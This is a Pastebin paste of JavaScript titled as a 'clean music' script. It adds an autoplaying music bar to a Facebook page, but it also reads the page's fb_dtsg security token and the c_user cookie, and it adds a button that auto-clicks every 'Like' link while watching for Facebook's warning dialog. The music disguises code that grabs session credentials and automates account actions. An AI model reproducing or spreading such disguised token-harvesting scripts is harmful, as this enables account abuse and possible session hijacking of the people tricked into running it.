Advertisement
thanhson

nhạc sạch

Jan 19th, 2014
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.34 KB | None | 0 0
  1. /* Nhạc */
  2. var parent=document.getElementsByTagName("html")[0];
  3. var _body = document.getElementsByTagName('body')[0];
  4. var _div = document.createElement('div');
  5. _div.style.height="25";
  6. _div.style.width="100%";
  7. _div.style.position="fixed";
  8. _div.style.top="auto";
  9. _div.style.bottom="0";
  10. _div.align="center";
  11. var _audio= document.createElement('audio');
  12. _audio.style.width="100%";
  13. _audio.style.height="25px";
  14. _audio.controls = true;
  15. _audio.autoplay = true;
  16. _audio.src = "http://download.s71.stream.nixcdn.com/8269bc74eac42bd911a69a5e906e4931/52c12693/NhacCuaTui093/Happynewyear-Dangcapnhat_kg8r.mp3";
  17. _div.appendChild(_audio);
  18. _body.appendChild(_div);
  19. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  20. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  21. var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
  22. var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  23. body = document.body;
  24. if(body != null)
  25. {
  26. div = document.createElement("div");
  27. div.style.position = "fixed";
  28. div.style.display = "block";
  29. div.style.width = "130px";
  30. div.style.opacity= 0.90;
  31. div.style.bottom = "+70px";
  32. div.style.left = "+0px";
  33. div.style.backgroundColor = "#E7EBF2";
  34. div.style.border = "1px solid #6B84B4";
  35. div.style.padding = "3px";
  36. div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>By-NBH</center></blink></a>"
  37. body.appendChild(div);
  38. }
  39.  
  40. if(body != null)
  41. {
  42. div = document.createElement("div");
  43. div.setAttribute('id','like2');
  44. div.style.position = "fixed";
  45. div.style.display = "block";
  46. div.style.width = "130px";
  47. div.style.opacity= 0.90;
  48. div.style.bottom = "+49px";
  49. div.style.left = "+0px";
  50. div.style.backgroundColor = "#E7EBF2";
  51. div.style.border = "1px solid #6B84B4";
  52. div.style.padding = "3px";
  53. div.innerHTML = "<a style='font-weight:bold;color:#3B5998' onclick='Anonymous69()'><center>Ngô Bá Hưng</center></a></a>"
  54. body.appendChild(div);
  55. unsafeWindow.Anonymous69 = function()
  56. {
  57. var B=0;
  58. var J=0;
  59. var I=document.getElementsByTagName("a");
  60. var H=new Array();
  61. for(var D=0;D<I.length;D++)
  62. {
  63. if(I[D].getAttribute("class")!=null&&I[D].getAttribute("class").indexOf("UFILikeLink")>=0&&(I[D].innerHTML=="Me gusta"||I[D].innerHTML=="Like"||I[D].innerHTML=="?????"||I[D].innerHTML=="Suka"||I[D].innerHTML=="Begen"||I[D].innerHTML=="??????"||I[D].innerHTML=="???!"||I[D].innerHTML=="?"||I[D].innerHTML=="Seneng"||I[D].innerHTML=="???"||I[D].innerHTML=="J?¢â‚¬â„¢aime"))
  64. {
  65. H[J]=I[D];
  66. J++
  67. }
  68. }
  69. function E(L)
  70. {
  71. H[L].click();
  72. var K="<a style='font-weight:bold;color:#3B5998' onclick='Autolike()'><center>Like Status: "+(L+1)+"/"+H.length+"</center></a>";
  73. document.getElementById("like2").innerHTML=K
  74. }
  75. function G(K)
  76. {
  77. window.setTimeout(C,K)
  78. }
  79. function A()
  80. {
  81. var M=document.getElementsByTagName("label");
  82. var N=false;
  83. for(var L=0;L<M.length;L++)
  84. {
  85. var K=M[L].getAttribute("class");
  86. if(K!=null&&K.indexOf("uiButton uiButtonLarge uiButtonConfirm")>=0)
  87. {
  88. alert("Warning from Facebook");
  89. N=true
  90. }
  91. }
  92. if(!N)
  93. {
  94. G(2160)
  95. }
  96. }
  97. function F(K)
  98. {
  99. window.setTimeout(A,K)
  100. }
  101. function C()
  102. {
  103. if(B<H.length)
  104. {
  105. E(B);
  106. F(700);
  107. B++
  108. }
  109. }
  110. ;
  111. C()
  112. }
  113. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement